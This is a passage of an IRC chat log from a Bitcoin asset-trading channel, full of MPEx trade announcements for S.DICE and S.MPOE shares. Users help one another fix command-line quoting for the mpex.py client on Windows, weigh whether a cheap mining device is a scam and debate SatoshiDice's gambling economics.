16:21:17 [MPEX] [S.DICE] 1992 @ 0.0037 = 7.3704 BTC [+] Jan 04 16:23:50 ;;calc 4500 *.035 Jan 04 16:23:51 157.5 Jan 04 16:30:03 [MPEX] [S.DICE] 42800 @ 0.0037 = 158.36 BTC [+] Jan 04 16:37:15 whales have been released to mpex.. waiting for the owners to catch up Jan 04 16:41:13 0.00370000 9`573 Jan 04 16:41:17 the ipo block is almost gone. Jan 04 16:41:24 hanging by a thread lol Jan 04 16:41:56 300k shares left all the way to 48 Jan 04 16:46:09 [MPEX] [S.DICE] 9573 @ 0.0037 = 35.4201 BTC [+] Jan 04 16:48:19 and it's officially gone. Jan 04 16:48:55 S.DICE IPO complete, erik gets his other 40mn shares on Feb 3rd Jan 04 16:51:35 I got the last shares :D Jan 04 16:51:46 yay! Jan 04 16:52:09 congrats! Jan 04 16:53:07 Does Erik plan to release more shares? or is he happy with 10% outstanding shares? Jan 04 16:53:23 [MPEX] [S.DICE] 1250 @ 0.00370331 = 4.6291 BTC [+] Jan 04 16:53:25 [MPEX] [S.DICE] 2900 @ 0.00370508 = 10.7447 BTC [+] Jan 04 16:53:26 [MPEX] [S.DICE] 3421 @ 0.00371317 = 12.7028 BTC [+] Jan 04 16:53:39 you should prolly ask him. Jan 04 17:02:14 [MPEX] [S.MPOE] 3950 @ 0.00065069 = 2.5702 BTC [+] Jan 04 17:02:14 [MPEX] [S.MPOE] 14796 @ 0.00065086 = 9.6301 BTC [+] Jan 04 17:05:39 hello Jan 04 17:05:55 can some1 write a proper BUY code for mpex ? Jan 04 17:06:01 as an example Jan 04 17:09:04 especially with the MPSIC ?! Jan 04 17:09:33 BUY|{MPSIC}|{quantity}|{price}|{expiry} Jan 04 17:12:59 mircea_popescu sorry to ping you but is MPSIC of satoshidice : S.DICE ? Jan 04 17:13:04 yep Jan 04 17:13:16 BUY|S.DICE|100|1000 Jan 04 17:13:22 will buy 100 shares at 1000 satoshi each Jan 04 17:14:45 I'm dealing with python pympex Jan 04 17:15:22 mpex.py BUY|S.DICE|100|1000 Jan 04 17:15:31 return that S.DICE is not recognized Jan 04 17:15:41 as internal command Jan 04 17:15:43 bla bla Jan 04 17:16:08 ./mpex.py BUY|S.DICE|100|1000 Jan 04 17:16:08 ? Jan 04 17:16:20 same between brackets Jan 04 17:16:29 you mean quotes ? Jan 04 17:16:33 mpex.py BUY, STAT, DEPOSIT are working fines Jan 04 17:16:46 but BUY|xxx not Jan 04 17:17:04 [MPEX] [S.DICE] 1129 @ 0.00371317 = 4.1922 BTC [+] Jan 04 17:17:05 [MPEX] [S.DICE] 3250 @ 0.00371362 = 12.0693 BTC [+] Jan 04 17:17:07 [MPEX] [S.DICE] 622 @ 0.00371425 = 2.3103 BTC [+] Jan 04 17:17:08 [MPEX] [S.DICE] 1750 @ 0.0037167 = 6.5042 BTC [+] Jan 04 17:17:08 [MPEX] [S.DICE] 4900 @ 0.00371738 = 18.2152 BTC [+] Jan 04 17:17:09 [MPEX] [S.DICE] 3500 @ 0.00372012 = 13.0204 BTC [+] Jan 04 17:17:10 [MPEX] [S.DICE] 2681 @ 0.00372636 = 9.9904 BTC [+] Jan 04 17:17:12 [MPEX] [S.DICE] 1700 @ 0.00374588 = 6.368 BTC [+] Jan 04 17:17:13 [MPEX] [S.DICE] 3740 @ 0.00374713 = 14.0143 BTC [+] Jan 04 17:17:14 [MPEX] [S.DICE] 2121 @ 0.00374741 = 7.9483 BTC [+] Jan 04 17:17:34 very strange indeed. Jan 04 17:18:22 [MPEX] [S.DICE] 1965 @ 0.00375156 = 7.3718 BTC [+] Jan 04 17:18:24 [MPEX] [S.DICE] 1000 @ 0.00375709 = 3.7571 BTC [+] Jan 04 17:18:25 [MPEX] [S.DICE] 1400 @ 0.00375821 = 5.2615 BTC [+] Jan 04 17:18:26 [MPEX] [S.DICE] 1600 @ 0.00376765 = 6.0282 BTC [+] Jan 04 17:18:27 [MPEX] [S.DICE] 1200 @ 0.00377004 = 4.524 BTC [+] Jan 04 17:18:28 [MPEX] [S.DICE] 1791 @ 0.00377672 = 6.7641 BTC [+] Jan 04 17:18:29 [MPEX] [S.DICE] 3300 @ 0.00377697 = 12.464 BTC [+] Jan 04 17:18:30 [MPEX] [S.DICE] 1750 @ 0.00379706 = 6.6449 BTC [+] Jan 04 17:18:31 [MPEX] [S.DICE] 500 @ 0.00379923 = 1.8996 BTC [+] Jan 04 17:18:32 [MPEX] [S.DICE] 84994 @ 0.0038 = 322.9772 BTC [+] Jan 04 17:18:41 dear Jan 04 17:18:51 all 0.0038 gone :D Jan 04 17:19:06 and i'm dealing with my command console for hours ^^ Jan 04 17:19:19 to expect to buy on share Jan 04 17:20:56 whoa Jan 04 17:21:21 StarenseN this is weird, obviously it's working for most everyone else. maybe some issue with character set on your system ? Jan 04 17:21:24 or i have no idea Jan 04 17:21:24 [MPEX] [S.DICE] 6 @ 0.0038 = 0.0228 BTC [+] Jan 04 17:21:25 [MPEX] [S.DICE] 2000 @ 0.00380632 = 7.6126 BTC [+] Jan 04 17:21:26 [MPEX] [S.DICE] 2503 @ 0.00381374 = 9.5458 BTC [+] Jan 04 17:21:28 [MPEX] [S.DICE] 2198 @ 0.00382637 = 8.4104 BTC [+] Jan 04 17:21:54 but if all else fails you can always paste commands manually into the site Jan 04 17:22:00 as a backstop in an emergency Jan 04 17:22:06 yeah i'm doing this Jan 04 17:22:17 but did several try Jan 04 17:22:18 :( Jan 04 17:22:35 StarenseN, from what you wrote in the night, it looks like you have trouble escaping the string Jan 04 17:22:50 ./mpex.py 'BUY|S.DICE|100|1000' Jan 04 17:22:55 ^ note the quotes Jan 04 17:22:58 paste that in there see Jan 04 17:23:07 maybe your system has weird quotes or something Jan 04 17:23:51 the ./mpex.py he pasted above is definitely wrong Jan 04 17:24:00 what i type is Jan 04 17:24:12 mpex.py BUY|S.DICE|100|1000 Jan 04 17:24:15 [MPEX] [S.DICE] 2 @ 0.00382637 = 0.0077 BTC [+] Jan 04 17:24:16 [MPEX] [S.DICE] 59198 @ 0.003995 = 236.496 BTC [+] Jan 04 17:24:25 BOOM raped Jan 04 17:24:26 StarenseN, add quotes like i did Jan 04 17:24:28 ok Jan 04 17:24:41 seems 40s won't be holding long. Jan 04 17:24:52 bugpowda will be pleased when he wakes up lol Jan 04 17:24:54 told ya. whales Jan 04 17:25:15 !ticker s.dice Jan 04 17:25:17 [MPEX:S.DICE] 1day: 0.00360414 / 0.00374101 / 0.003995 (635284 shares, 2,376.61 BTC), 30day: 0.0014 / 0.00329973 / 0.003995 (13422042 shares, 44,289.18 BTC) Jan 04 17:26:03 doesnt work with quotes Jan 04 17:26:12 mpex.py 'BUY|S.DICE|100|399500' Jan 04 17:26:12 what is the error message? Jan 04 17:26:28 'S.DICE" is not recognize as internal/external command Jan 04 17:26:38 'S.DICE' Jan 04 17:26:45 i have a french version Jan 04 17:26:51 of windows Jan 04 17:27:20 maybe python isn't on the path or something... how can he check to see? Jan 04 17:27:28 O.o... it's windows? then try double quotes instead.. and invoke python properly Jan 04 17:27:32 ya, it sounds like you're not geting python to process it Jan 04 17:27:40 I did STAT working fine Jan 04 17:27:40 python mpex.py "BUY|S.DICE|100|399500' Jan 04 17:27:42 python mpex.py "BUY|S.DICE|100|399500" Jan 04 17:27:44 and deposit BTC Jan 04 17:27:46 ^this Jan 04 17:28:25 [MPEX] [S.DICE] 100 @ 0.003995 = 0.3995 BTC [+] Jan 04 17:28:27 jurov Jan 04 17:28:32 that's working now Jan 04 17:28:34 nice jurov :] Jan 04 17:28:41 haha. french version of windows. Jan 04 17:28:49 i can die now. we got mpex to work on a french version of windows. Jan 04 17:28:52 <@assbot> [MPEX] [S.DICE] 100 @ 0.003995 = 0.3995 BTC [+] > hey mum i'm on TV Jan 04 17:28:53 haha Jan 04 17:29:04 lol Jan 04 17:29:12 ty :) Jan 04 17:29:15 yw. Jan 04 17:29:25 not that i did anything, but you're welcome just the same :D Jan 04 17:29:34 may update your FAQ if possible Jan 04 17:29:54 what'd you suggest ? Jan 04 17:30:31 nah, that should rather go into pimpex documentation Jan 04 17:30:38 [MPEX] [S.DICE] 12680 @ 0.003995 = 50.6566 BTC [+] Jan 04 17:31:00 probably. Jan 04 17:31:08 running inder unix : ./mpex.py 'BUY|S.DICE|100|399500' running under win: python mpex.py "BUY|S.DICE|100|399500" Jan 04 17:31:09 or... in the windows documentation Jan 04 17:31:21 [MPEX] [S.DICE] 50000 @ 0.003995 = 199.75 BTC [+] Jan 04 17:31:27 but yeah. Azelphur you feel like adding that ? Jan 04 17:31:30 proper quoting IS documented since ol'dos Jan 04 17:32:32 And, dear folks! If anybody offered me to make MPEx GUI for reasonable price, it would probably already be done... Jan 04 17:32:50 :D Jan 04 17:33:06 isn't coinbr kinda that anyway ? Jan 04 17:34:03 ofc. but i mean desktop app. Jan 04 17:34:12 mpexagent is already halfway there as it parses the stuff, i expected someone will pick up on it Jan 04 17:35:08 but everyone is too cheap or lazy or dunno Jan 04 17:36:06 i'll tell you what it is Jan 04 17:36:16 nobody wants to sit down and put the work into anything these days. Jan 04 17:36:26 if you cook they'll eat, if you don't cook they'll starve with the food in the fridge Jan 04 17:37:00 true Jan 04 17:37:07 jurov > i did mpex.py "BUY|S.DICE|100|399500" as python wasnt recognized command (althought i added the PATH but wrongly i think) Jan 04 17:37:19 Azelphur Jan 04 17:38:13 StarenseN: go to the directory where u installed python Jan 04 17:38:18 and then try with python command Jan 04 17:39:15 [MPEX] [S.DICE] 54087 @ 0.003995 = 216.0776 BTC [+] Jan 04 17:39:34 ^ mine Jan 04 17:39:37 also Jan 04 17:39:44 it's working with double quote Jan 04 17:40:06 yes, single quotes are for unices Jan 04 17:40:41 and for DEPOSIT > i had to type mpex.py DEPOSIT|{100} to deposit 100 BTC Jan 04 17:40:49 no double quotes, but brackets Jan 04 17:41:23 interesting. "DEPOSIT|100" should work too, i never had to use burly braces Jan 04 17:41:38 let met try Jan 04 17:42:32 mpex.py "DEPOSIT|100" is working also Jan 04 17:42:52 dears trust me i went insane today :D Jan 04 17:43:02 if only i knew about the " " Jan 04 17:43:16 and i missed a lot of cheap shares FML Jan 04 17:43:21 for minutes Jan 04 17:43:30 whoa Jan 04 17:43:36 this is undocumented unexpected fudge Jan 04 17:43:48 you mean to tell me you actually ran mpex.py DEPOSIT|{100} and it worked as such ? Jan 04 17:44:30 http://live.coinbr.com/?mpsic=S.DICE lol that looks cute Jan 04 17:45:18 http://www.cryptocoinexplorer.com/ Jan 04 17:45:22 shit just got real Jan 04 17:46:22 someone is making some coin Jan 04 17:51:36 bitcoin tgp ftw Jan 04 17:51:42 preparing ourselves for the tube sites Jan 04 17:59:29 http://www.cpcelectronics.co.uk/acatalog/CPC__5.2_GH_s_Miner_.html Jan 04 17:59:44 How quickly can I get my order? Jan 04 17:59:45 Once your payment has been recieved, your order will be assembled and despatched within 14 days Jan 04 18:00:12 discuss Jan 04 18:01:58 lol what is it ? Jan 04 18:02:27 fpga hardcopy ? its kinda in the middle between fpga and asic Jan 04 18:02:37 (stats, power, price) wise Jan 04 18:05:52 [MPEX] [S.DICE] 17529 @ 0.003995 = 70.0284 BTC [+] Jan 04 18:11:09 [MPEX] [S.DICE] 2354 @ 0.00397155 = 9.349 BTC [-] Jan 04 18:16:32 [MPEX] [S.DICE] 546 @ 0.00397155 = 2.1685 BTC [-] Jan 04 18:17:03 i think it is a scam Jan 04 18:17:12 [MPEX] [S.DICE] 1006 @ 0.00395635 = 3.9801 BTC [-] Jan 04 18:17:13 [MPEX] [S.DICE] 19400 @ 0.003995 = 77.503 BTC [+] Jan 04 18:17:20 we've been discussing this in secret mining channels Jan 04 18:17:46 [MPEX] [S.DICE] 1006 @ 0.003995 = 4.019 BTC [+] Jan 04 18:20:03 [MPEX] [S.DICE] 700 @ 0.00399556 = 2.7969 BTC [+] Jan 04 18:21:01 jcpham: it's not a scam, they are reselling their gpu rigs Jan 04 18:21:11 heh at 70w ? Jan 04 18:21:14 ummm Jan 04 18:21:25 oh Jan 04 18:21:27 nvm Jan 04 18:21:34 5.2GH/s at 70w at $139 makes zero sense Jan 04 18:21:35 it made sense, i just woke up Jan 04 18:21:58 that's almost twice my farm for peanuts Jan 04 18:22:04 and at 70w Jan 04 18:22:12 and it ships in 14 days Jan 04 18:22:16 according to their faq Jan 04 18:22:26 well, for $139 someone should risk it and find out :p Jan 04 18:22:37 nevermind those few g's i dropped on asics that do not even exist Jan 04 18:23:00 these guys have the sweetheart secret cheap AMD stream chips Jan 04 18:24:56 jcpham: I can tell you exactly who should risk it if you tell me what 5.2gh/s is actually worth? Jan 04 18:25:18 ;;genrate 5200 Jan 04 18:25:19 The expected generation output, at 5200.0 Mhps, given difficulty of 2979636.61694, is 0.877675410033 BTC per day and 0.0365698087514 BTC per hour. Jan 04 18:25:36 $10/day? Jan 04 18:25:58 until the diff spikes 20x Jan 04 18:26:18 http://royal.pingdom.com/2012/04/24/irc-is-dead-long-live-irc/ Jan 04 18:27:53 if it can last a month and a half, with the diff climbing pretty fast, it *just* makes it profitable for you to risk it Jan 04 18:28:06 well Jan 04 18:28:12 except i'll lose 139$ Jan 04 18:28:17 when it never arrives Jan 04 18:28:19 if you are 98% sure it's not a scam Jan 04 18:28:30 i'm 99% sure it is Jan 04 18:29:31 well then, it's net to curn out 640 usd per day Jan 04 18:29:39 s/net/need/ Jan 04 18:30:37 sounds like a much lower difficulty Jan 04 18:30:45 that i'll never see again Jan 04 18:33:41 YES Jan 04 18:36:48 !ticker S.DICE Jan 04 18:36:50 [MPEX:S.DICE] 1day: 0.00360414 / 0.00379322 / 0.00399556 (784242 shares, 2,974.80 BTC), 30day: 0.0014 / 0.0033079 / 0.00399556 (13578925 shares, 44,917.79 BTC) Jan 04 18:37:02 ;;ticker Jan 04 18:37:08 BTCUSD ticker | Best bid: 13.42015, Best ask: 13.44999, Bid-ask spread: 0.02984, Last trade: 13.42015, 24 hour volume: 23870.53789899, 24 hour low: 13.26509, 24 hour high: 13.47999, 24 hour vwap: 13.36822 Jan 04 18:37:41 [MPEX] [S.DICE] 2200 @ 0.0048 = 10.56 BTC [+] Jan 04 18:42:12 http://translate.google.com/#en/fr/filled%20with Jan 04 18:42:19 click the speaker and listen Jan 04 18:42:32 where does "he now praises the ipad" come from? Jan 04 18:45:27 [MPEX] [S.DICE] 300 @ 0.00467159 = 1.4015 BTC [-] Jan 04 18:54:30 [MPEX] [S.MPOE] 9000 @ 0.00064871 = 5.8384 BTC [-] Jan 04 18:54:32 [MPEX] [S.MPOE] 11200 @ 0.00064579 = 7.2328 BTC [-] Jan 04 18:54:33 [MPEX] [S.MPOE] 1847 @ 0.00064536 = 1.192 BTC [-] Jan 04 19:17:56 http://devopsreactions.tumblr.com/ Jan 04 19:33:30 kakobreklaa: that's entertaining :) Jan 04 19:35:40 some of those are hilarious Jan 04 19:35:55 http://devopsreactions.tumblr.com/post/38704906537/when-discussing-raid-and-one-mentions-that-more-than Jan 04 19:36:01 is sort of my favorite Jan 04 19:37:09 Hmm.. I wonder if they also run http://researchinprogress.tumblr.com Jan 04 19:37:21 which is like my field's favorite website. Jan 04 19:42:53 [MPEX] [S.DICE] 2650 @ 0.00426818 = 11.3107 BTC [-] Jan 04 19:48:01 lmao I love the oracle one Jan 04 19:49:39 In devops we are face fiscal cliff every year when Oracle license is up for renew. Jan 04 19:49:51 https://twitter.com/DEVOPS_BORAT Jan 04 19:52:13 i am on devops team Jan 04 19:52:27 we have eternal oracle license Jan 04 19:54:00 In devops is no try, is only catch or not catch of exception. Jan 04 20:13:32 hah Jan 04 20:16:50 [MPEX] [S.DICE] 500 @ 0.00426818 = 2.1341 BTC [-] Jan 04 20:16:51 [MPEX] [S.DICE] 1850 @ 0.00426058 = 7.8821 BTC [-] Jan 04 20:22:11 whoa Jan 04 20:22:21 hadnt looked at that s.dice price Jan 04 20:23:40 48 Jan 04 20:23:43 yeh Jan 04 20:30:11 what's special about the price Jan 04 20:30:25 i haven't been paying attention for months now so i really do not know Jan 04 20:30:37 its higher than yesterday ;) Jan 04 20:30:48 why Jan 04 20:31:00 supply and demand again Jan 04 20:31:15 but i do not get it Jan 04 20:31:26 why does it go up, it's more profitable for the operators Jan 04 20:31:37 they are literally taking people's money on the front end Jan 04 20:31:48 well some people saw the fat dividend that was paid, and got jealous Jan 04 20:31:50 why are they taking people's money on the back also Jan 04 20:32:06 also there is an alleged new passtrhough at havelock so he needs to buy some if he is legit Jan 04 20:32:15 who is they? Jan 04 20:32:25 they being the ominous they Jan 04 20:32:35 whoever is making profits on overvalued junk Jan 04 20:32:55 i'm confused, how is it overvalued? Jan 04 20:33:01 jcpham: all of the operator's shares (made available) have been sold tho Jan 04 20:33:05 i'm not sure Jan 04 20:33:10 i don't want anything to do with it Jan 04 20:33:18 not even to short? Jan 04 20:33:29 i don't care Jan 04 20:33:39 you can have 50btc and make money with it if you want Jan 04 20:33:45 bah, how am i supposed to make btc off of ambivilance Jan 04 20:33:56 the dice are bad Jan 04 20:34:03 i expect it to collapse Jan 04 20:34:47 i guess there is a market for gambling that i do not understand Jan 04 20:35:12 some people like to gamble Jan 04 20:35:51 statisitcally it takes more money every day from what i've seen Jan 04 20:36:05 why people throw that down a hole dumbfounds me Jan 04 20:36:31 because about half of the players double their money Jan 04 20:36:50 i think that's rather thrilling, and they seek it out again later Jan 04 20:36:59 well there are issues, such as low barrier to competitors, operator risk in one man, and the bitcoin network retaliating against SD "spam" transactions Jan 04 20:37:12 but everything has risks Jan 04 20:37:26 you ass has risks Jan 04 20:37:30 ;D Jan 04 20:37:46 the risks get bigger the longer i wait to go to walmart cause im out of TP Jan 04 20:38:16 oooh, witty Jan 04 20:38:27 well true Jan 04 20:38:43 off to walmart Jan 04 20:39:05 lol Jan 04 20:40:17 sir smickles Jan 04 20:40:25 how many of SD's competitors go to major global gambling conventions and advertise such as SD has Jan 04 20:40:26 you gonna be around? Jan 04 20:40:43 over what timescale thestrin1puller esq. Jan 04 20:42:12 next 30 minutes Jan 04 20:43:16 I can be :) Jan 04 21:13:56 ;;ticker Jan 04 21:13:56 BTCUSD ticker | Best bid: 13.46002, Best ask: 13.50000, Bid-ask spread: 0.03998, Last trade: 13.46002, 24 hour volume: 28474.56469043, 24 hour low: 13.27000, 24 hour high: 13.50000, 24 hour vwap: 13.40272 Jan 04 21:14:11 !ticker S.DICE Jan 04 21:14:13 [MPEX:S.DICE] 1day: 0.00360675 / 0.00380384 / 0.0048 (763127 shares, 2,902.82 BTC), 30day: 0.0014 / 0.00330856 / 0.0048 (13581437 shares, 44,935.05 BTC) Jan 04 21:34:54 [MPEX] [S.DICE] 1000 @ 0.00425836 = 4.2584 BTC [-] Jan 04 21:34:56 [MPEX] [S.DICE] 50 @ 0.00425837 = 0.2129 BTC [+] Jan 04 21:45:56 !help Jan 04 21:45:57 List of commands: Jan 04 21:45:58 !ticker (desc: returns current MPEX ticker values) Jan 04 21:46:17 !ticker Jan 04 21:46:17 Provide ticker. Jan 04 21:46:35 S.DICE Jan 04 21:47:23 !ticker S.DICE Jan 04 21:47:24 [MPEX:S.DICE] 1day: 0.00360675 / 0.00381507 / 0.0048 (693927 shares, 2,647.39 BTC), 30day: 0.0014 / 0.00330863 / 0.0048 (13582487 shares, 44,939.52 BTC) Jan 04 21:52:36 is it sleeping time in romania? been waiting a while for my mpex deposit to appear :( Jan 04 21:53:59 Wow.... There are a LOT of new deposits coming in... http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Jan 04 21:54:22 no but its friday,Ooh Yeaa Jan 04 21:54:27 ;;seen mireca_popescu Jan 04 21:54:28 I have not seen mireca_popescu. Jan 04 21:54:50 ;;seen mircea_popescu Jan 04 21:54:50 mircea_popescu was last seen in #bitcoin-assets 4 hours, 3 minutes, and 5 seconds ago: preparing ourselves for the tube sites Jan 04 22:06:53 !ticker S.DICE Jan 04 22:06:54 [MPEX:S.DICE] 1day: 0.00360675 / 0.00381507 / 0.0048 (693927 shares, 2,647.39 BTC), 30day: 0.0014 / 0.00330863 / 0.0048 (13582487 shares, 44,939.52 BTC) Jan 04 22:26:32 leave tulkas alone! https://bitcointalk.org/index.php?topic=112447.msg1434838#msg1434838 Jan 04 22:35:45 [MPEX] [S.DICE] 1154 @ 0.00430226 = 4.9648 BTC [+] Jan 04 22:35:46 [MPEX] [S.DICE] 882 @ 0.00435658 = 3.8425 BTC [+] Jan 04 22:37:37 !ticker S.DICE Jan 04 22:37:38 [MPEX:S.DICE] 1day: 0.00360675 / 0.00381657 / 0.0048 (695963 shares, 2,656.19 BTC), 30day: 0.0014 / 0.00330879 / 0.0048 (13584152 shares, 44,947.13 BTC) Jan 04 22:51:00 [MPEX] [S.MPOE] 3047 @ 0.00064398 = 1.9622 BTC [-] Jan 04 22:51:02 [MPEX] [S.MPOE] 6028 @ 0.00064116 = 3.8649 BTC [-] Jan 04 22:56:40 [MPEX] [S.DICE] 168 @ 0.00435658 = 0.7319 BTC [+] Jan 04 22:56:41 [MPEX] [S.DICE] 1000 @ 0.00455096 = 4.551 BTC [+] Jan 04 22:58:17 !ticker S.DICE Jan 04 22:58:19 [MPEX:S.DICE] 1day: 0.00360675 / 0.00381904 / 0.0048 (690066 shares, 2,635.40 BTC), 30day: 0.0014 / 0.00330889 / 0.0048 (13585320 shares, 44,952.41 BTC) Jan 04 22:59:01 Diablo-D3: you around? Jan 04 22:59:09 get too drunk on new years? forgot where we are? :P Jan 04 23:00:13 Ukto: where is mah ff7? Jan 04 23:00:32 i have to finish some stupid password recovery code for weex Jan 04 23:00:35 then I will go look Jan 04 23:16:09 [MPEX] [S.DICE] 1338 @ 0.00456373 = 6.1063 BTC [+] Jan 04 23:19:27 !ticker S.DICE Jan 04 23:19:29 [MPEX:S.DICE] 1day: 0.00360675 / 0.00382049 / 0.0048 (691404 shares, 2,641.50 BTC), 30day: 0.0014 / 0.00330901 / 0.0048 (13586658 shares, 44,958.52 BTC) Jan 04 23:28:25 [MPEX] [S.MPOE] 3953 @ 0.00064496 = 2.5495 BTC [+] Jan 04 23:28:26 [MPEX] [S.MPOE] 3004 @ 0.00065086 = 1.9552 BTC [+] Jan 05 00:04:38 [MPEX] [S.DICE] 1800 @ 0.00434025 = 7.8125 BTC [-] Jan 05 00:19:24 !ticker S.DICE Jan 05 00:19:26 [MPEX:S.DICE] 1day: 0.00360675 / 0.0038219 / 0.0048 (692848 shares, 2,648.00 BTC), 30day: 0.0014 / 0.00330915 / 0.0048 (13586893 shares, 44,961.19 BTC) Jan 05 00:19:45 ;;ticker Jan 05 00:19:45 BTCUSD ticker | Best bid: 13.43349, Best ask: 13.49899, Bid-ask spread: 0.06550, Last trade: 13.43349, 24 hour volume: 29413.36431235, 24 hour low: 13.27311, 24 hour high: 13.52000, 24 hour vwap: 13.41950 Jan 05 00:28:27 [MPEX] [S.DICE] 197 @ 0.00455393 = 0.8971 BTC [+] Jan 05 00:41:47 Ukto: hrm? Jan 05 00:50:41 [MPEX] [S.DICE] 650 @ 0.00447191 = 2.9067 BTC [-] Jan 05 01:08:56 [MPEX] [S.MPOE] 743 @ 0.00065283 = 0.4851 BTC [+] Jan 05 01:08:57 [MPEX] [S.MPOE] 371 @ 0.00064116 = 0.2379 BTC [-] Jan 05 01:17:13 Diablo-D3: pm Jan 05 01:39:59 [MPEX] [S.DICE] 200 @ 0.00446439 = 0.8929 BTC [-] Jan 05 01:46:08 [MPEX] [S.DICE] 2400 @ 0.00435162 = 10.4439 BTC [-] Jan 05 02:16:50 [MPEX] [S.MPOE] 10000 @ 0.00063395 = 6.3395 BTC [-] Jan 05 02:16:51 [MPEX] [S.MPOE] 37450 @ 0.00063394 = 23.7411 BTC [-] Jan 05 02:16:53 [MPEX] [S.MPOE] 5300 @ 0.00063259 = 3.3527 BTC [-] Jan 05 02:16:54 [MPEX] [S.MPOE] 1672 @ 0.00063258 = 1.0577 BTC [-] Jan 05 02:16:55 [MPEX] [S.MPOE] 2328 @ 0.00063114 = 1.4693 BTC [-] Jan 05 02:19:20 [MPEX] [S.DICE] 2500 @ 0.00441206 = 11.0302 BTC [+] Jan 05 02:22:36 [MPEX] [S.DICE] 1000 @ 0.0043405 = 4.3405 BTC [-] Jan 05 02:22:38 [MPEX] [S.DICE] 2350 @ 0.00434025 = 10.1996 BTC [-] Jan 05 02:27:04 [MPEX] [S.DICE] 2100 @ 0.004331 = 9.0951 BTC [-] Jan 05 02:31:34 [MPEX] [S.DICE] 2489 @ 0.004331 = 10.7799 BTC [-] Jan 05 02:38:07 let's take some profits Jan 05 02:38:13 and then buy back in Jan 05 02:44:41 [MPEX] [S.DICE] 1900 @ 0.00427948 = 8.131 BTC [-] Jan 05 02:57:37 mkay so i have a technical announcement re mpex Jan 05 02:57:56 one of the core boxes went down for unknown reasons. it's still fscking atm Jan 05 02:58:05 a replacement was comissioned and is going online within minutes Jan 05 02:58:36 i don't think this actually had any effect, and i'm not concerned enough to halt trading. Jan 05 02:58:53 oh shit its the sec hackers Jan 05 02:59:05 lol Jan 05 02:59:26 quick, withdraw EVERYTHING!!!1! Jan 05 02:59:42 as per usual mpex only processes deposits :D Jan 05 02:59:49 python -m mpex 'WITHDRAW|*' Jan 05 02:59:56 shit, wrong window :o Jan 05 03:00:24 lol, 'only processes deposits' Jan 05 03:00:33 you forgot the {}s Jan 05 03:00:47 {}? Jan 05 03:01:09 if i'm typing that into bash, it should work. well, aside from the '*' Jan 05 03:01:38 o, you missed the earlier convo Jan 05 03:01:54 I suppose so. Is it far back in the log? Jan 05 03:02:09 when it was discovered that for unclear and unexplainable reasons mypex DEPOSIT|{100} works as such Jan 05 03:02:11 without any quotes Jan 05 03:02:16 at least on french windows Jan 05 03:02:44 No withdrawing! Jan 05 03:02:55 Buy more S.DICE Jan 05 03:03:03 [MPEX] [S.MPOE] 4282 @ 0.00063631 = 2.7247 BTC [+] Jan 05 03:03:05 [MPEX] [S.MPOE] 9436 @ 0.00063816 = 6.0217 BTC [+] Jan 05 03:03:09 naw, any spare btc goes to fund SOEBOT! Jan 05 03:03:11 or that. Jan 05 03:11:31 ow shit it's trading 43s Jan 05 03:11:34 !ticker s.dice Jan 05 03:11:35 [MPEX:S.DICE] 1day: 0.00360675 / 0.00384987 / 0.0048 (633606 shares, 2,439.31 BTC), 30day: 0.0014 / 0.00331037 / 0.0048 (13600172 shares, 45,021.69 BTC) Jan 05 03:11:43 48 whoa Jan 05 03:14:19 [MPEX] [S.DICE] 850 @ 0.00424664 = 3.6096 BTC [-] Jan 05 03:15:03 "I actually didn't notice the 30BTC fee when I submitted my key. I have to pay 30BTC fee even for small purchases?" Jan 05 03:15:09 dude someone has to bring glbse back Jan 05 03:15:14 that's the second dood today. Jan 05 03:15:42 I've wanted to get a large amount but couldn't raise the capital for it. Jan 05 03:15:55 ther's a 30 BTC fee? SCAM! Jan 05 03:16:29 Yes, I paid it long ago Jan 05 03:16:44 Well not that long ago... but when it was 20 BTC I think Jan 05 03:18:20 I can't send commands to MPEx Jan 05 03:18:21 anyone care to donate .11165070 to science? Jan 05 03:19:26 ;;lucky "Chief Scientist Gavin Anderson" Jan 05 03:19:29 http://www.kreabgavinanderson.com/Default.aspx?tabid=229 Jan 05 03:19:42 lame Jan 05 03:20:45 heh Jan 05 03:20:52 Namjies why not ? Jan 05 03:22:02 I swear, someone like businessweek call gavin the chief scientist of the bitcoin project Jan 05 03:22:05 must find link Jan 05 03:22:46 “It’s still a pretty raw technology,” says Gavin Andresen, chief scientist at Bitcoin Foundation. “It’s pretty obvious that it’s been designed by geeks for geeks. It’s not easy to use yet, but it’s getting easier to use all the time.” Jan 05 03:22:56 http://www.businessweek.com/articles/2013-01-03/bitcoin-making-online-gambling-legal-in-the-u-dot-s-dot Jan 05 03:22:57 heh Jan 05 03:23:40 so now, I must edit wikipedia, making gavin a scientist Jan 05 03:23:58 (afterall, it's from a reliable source) Jan 05 03:24:53 Ah nevermind. Jan 05 03:25:14 It's because I switch between mine and BitVPS's account by deleting/readding key. Jan 05 03:25:19 [MPEX] [S.DICE] 2100 @ 0.00424418 = 8.9128 BTC [-] Jan 05 03:25:19 [MPEX] [S.DICE] 1200 @ 0.00423911 = 5.0869 BTC [-] Jan 05 03:25:43 I forgot to mark the certificate as my own. Jan 05 03:29:14 [MPEX] [S.DICE] 700 @ 0.00412314 = 2.8862 BTC [-] Jan 05 03:37:42 [MPEX] [S.MPOE] 16000 @ 0.00065549 = 10.4878 BTC [+] Jan 05 03:41:30 [MPEX] [S.DICE] 800 @ 0.00382726 = 3.0618 BTC [-] Jan 05 03:47:07 Might have been a bit too much enthusiasm with S.DICE Jan 05 03:47:53 Where are expected dividends this month at right now? Jan 05 03:49:02 Ah, already distributed. Hmm, I see. Jan 05 03:49:59 Namjies made 5.x% for dec, looks about 10k ahead for january so far Jan 05 03:50:19 at current top price that'd be a 2% Jan 05 03:53:16 1k on MPEx that is Jan 05 03:53:43 Where do you guys get the numbers anyway for current earnings for the month? Jan 05 03:54:23 [MPEX] [S.MPOE] 961 @ 0.00065549 = 0.6299 BTC [+] Jan 05 03:54:25 [MPEX] [S.MPOE] 9700 @ 0.00065793 = 6.3819 BTC [+] Jan 05 03:54:26 [MPEX] [S.MPOE] 11876 @ 0.00065919 = 7.8285 BTC [+] Jan 05 03:59:12 forum says they had 10k profit on first day... then lost 11k by second day. Jan 05 03:59:24 They're back at slightly over beggining of the month Jan 05 03:59:38 Hmm, found the graphics in one of the forum threads. Jan 05 03:59:53 a ok ? Jan 05 03:59:56 i was behind the news. Jan 05 04:01:25 yeah, it swings over and under the house edge Jan 05 04:01:37 But very profitable overall nonetheless. Jan 05 04:01:41 so they made -11000 past 24ish hours ? Jan 05 04:01:47 link me to 